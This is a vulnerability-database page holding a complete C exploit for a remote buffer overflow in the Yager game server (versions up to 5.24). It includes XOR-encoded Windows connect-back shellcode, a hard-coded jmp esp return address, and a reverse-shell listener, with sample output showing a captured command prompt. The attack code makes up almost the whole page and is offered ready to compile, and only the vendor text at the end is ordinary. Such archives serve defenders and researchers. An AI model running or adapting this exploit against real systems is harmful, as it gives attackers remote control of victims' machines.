Vulners
Lucene search
Yager <= 5.24 Remote Buffer Overflow Exploit
/*
*
* Yager <= 5.24 Remote Buffer Overflow Exploit
*
* cybertronic[at]gmx[dot]net
* 04/25/2005
*
* send all the money to Luigi Auriemma
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0xdeadc0de] crash server
* --[ 1 [0x300686bd] binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]
* >> 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Yager>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT_UDP 34855
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
* prototypes
*
*/
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, unsigned long ret );
int isip ( char *ip );
int send_handshake ( int s, struct sockaddr_in remote_addr );
int shell ( int s, char* tip, unsigned short cbport );
void header ();
void start_reverse_handler ( char* argv3 );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
/*
*
* structures
*
*/
struct targets {
int num;
unsigned long ret;
char name[64];
}
target[]= {
{ 0, 0xdeadc0de, "crash server" },
{ 1, 0x300686bd, "binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]" } //push esp in binkw32.dll
};
/*
*
* functions
*
*/
int
exploit ( int s, unsigned long xoredcbip, unsigned short xoredcbport, unsigned long ret )
{
int r;
char buffer_pack[592];
printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
printf ( "--[ ret: 0x%08x [ jmp esp in binkw32.dll ]\n", ret );
memcpy ( &reverseshell[111], &xoredcbip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
r = ~time ( NULL ) & 0xffff;
printf ( "--[ exploiting packet overflow...\n" );
bzero ( &buffer_pack, sizeof ( buffer_pack ) );
memset ( buffer_pack, 0x41, 268 );
strncat ( buffer_pack, ( unsigned char* ) &ret, 4 );
strncat ( buffer_pack, "\x41\x41\x41\x41", 4 ); //4 bytes padding
memcpy ( buffer_pack + 276, reverseshell, sizeof ( reverseshell ) - 1 );
buffer_pack[0] = 0x00;
buffer_pack[1] = 0x00;
buffer_pack[2] = 0x00;
buffer_pack[3] = 0x00;
buffer_pack[4] = 0x46; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
buffer_pack[5] = 0x02; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
buffer_pack[6] = ( r & 0x00ff );
buffer_pack[7] = ( ( r & 0xff00 ) >> 8 );
buffer_pack[8] = 0x00;
buffer_pack[9] = 0x00;
printf ( "--[ sending packet..." );
if ( write ( s, buffer_pack, sizeof ( buffer_pack ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
send_handshake ( int s, struct sockaddr_in remote_addr )
{
char* p;
char crap[23];
char in[2048];
unsigned short port;
bzero ( &crap, sizeof ( crap ) );
crap[0] = 0x59;
crap[1] = 0x5f;
crap[2] = 0x4e;
crap[3] = 0x45;
crap[4] = 0x54;
crap[5] = 0x5f;
crap[6] = 0x59;
crap[7] = 0x41;
crap[8] = 0x47;
crap[9] = 0x45;
crap[10] = 0x52;
crap[11] = 0x5f;
crap[12] = 0x43;
crap[13] = 0x4c;
crap[14] = 0x49;
crap[15] = 0x45;
crap[16] = 0x4e;
crap[17] = 0x54;
crap[18] = 0x00;
*( u_short* ) ( crap + 19 ) = ~time ( NULL );
crap[21] = 0x00;
crap[22] = 0x00;
printf ( "--[ sending handshake [UDP]..." );
if ( sendto ( s, crap, sizeof ( crap ), 0, ( struct sockaddr* ) &remote_addr, sizeof ( remote_addr ) ) < 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
printf ( "--[ reading server response [UDP]..." );
bzero ( &in, sizeof ( in ) );
if ( recvfrom ( s, in, sizeof ( in ) -1, 0, NULL, NULL ) < 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
p = in + 19;
port = ntohs ( *( u_short * ) p );
printf ( "--[ server port: %d\n", port );
return ( port );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
start_reverse_handler ( char* argv3 )
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int s1, s2, targ, i;
unsigned long xoredcbip;
unsigned short cbport, xoredcbport, port;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 4 )
{
printf ( "Usage: %s <ip> <cbip> <cbport>\n", argv[0] );
exit ( 1 );
}
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
{
printf ( "Invalid Target IP!\n" );
exit ( 1 );
}
if ( !isip ( argv[2] ) )
{
printf ( "Invalid connect back IP!\n" );
exit ( 1 );
}
printf("--[ select target\n");
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
if ( targ != 0 )
if ( targ != 1 )
{
printf ( "--[ invalid target!\n" );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT_UDP );
if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 )
{
printf ( "handshake FAILED!\n" );
exit ( 1 );
}
close ( s1 );
if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port );
remote_addr.sin_port = htons ( port );
if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
close ( s2 );
start_reverse_handler ( argv[3] );
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Apr 2005 00:00Current
7.1High risk
Vulners AI Score7.1